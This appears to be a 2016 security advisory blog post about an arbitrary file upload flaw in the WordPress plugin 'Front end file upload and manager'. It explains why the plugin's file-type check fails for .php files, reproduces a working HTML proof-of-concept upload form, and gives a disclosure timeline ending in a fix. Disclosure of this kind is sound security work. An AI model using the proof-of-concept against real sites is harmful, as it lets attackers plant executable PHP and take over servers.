19 Sep

Arbitrary File Upload Vulnerability in Front end file upload and manager Plugin

After discovering an arbitrary file upload vulnerability in the plugin N-Media Post Front-end Form recently, we took a look at other plugins from the same developer and found that three other shared same the same vulnerable code. One of those is Front end file upload and manager Plugin.

In the case of this plugin, the developer had actually tried to restrict what kind of files could be uploaded, unlike the other plugin:

/* ========== Invalid File type checking ========== */
$file_type = wp_check_filetype($_REQUEST ["name"], null );
$allowed_types = explode(',', $this->get_option('_file_types'));
if( !in_array($file_type['ext'], $allowed_types) ){
	$response ['status'] = 'error';
	$response ['message'] = __ ( 'File type not valid', 'nm-filemanager' );
	die ( json_encode($response) );
/* ========== Invalid File type checking ========== */

The problem is that in the plugin’s default state it doesn’t work properly for .php files, which seems to be more WordPress’ fault than the developers. The plugin tries to get the file to be uploaded’s file extension using WordPress’ function wp_check_filetype(). What isn’t mentioned in that function’s documentation is that it only returns the file’s extension and type if the file extension is one that is permitted to be uploaded by WordPress. The plugin’s code then checks if the extension is one that is allowed to be uploaded by the plugin’s settings and exits if it isn’t. Since by default no extensions are set to be allowed, the .php files empty extension will be seen as being allowed and the file is uploaded.

Proof of Concept

The following proof of concept will upload the selected file to the directory /wp-content/uploads/user_uploads/ as upload.php.

Make sure to replace “[path to WordPress]” with the location of WordPress.

<form action="http://[path to WordPress]/wp-admin/admin-ajax.php" method="POST" enctype="multipart/form-data">
<input type="hidden" name="action" value="nm_filemanager_upload_file" />
<input type="hidden" name="name" value="upload.php" />
<input type="file" name="file" />
<input type="submit" value="Submit request" />


  • 7/16/2016 – Developer notified.
  • 7/16/2016 – Developer responds.
  • 9/19/2016 – WordPress.org Plugin Directory notified.
  • 9/21/2016 – Plugin removed from WordPress.org Plugin Directory.
  • 9/24/2016 – Version 4.0 released, which fixes vulnerability.

Leave a Reply

Your email address will not be published. Required fields are marked *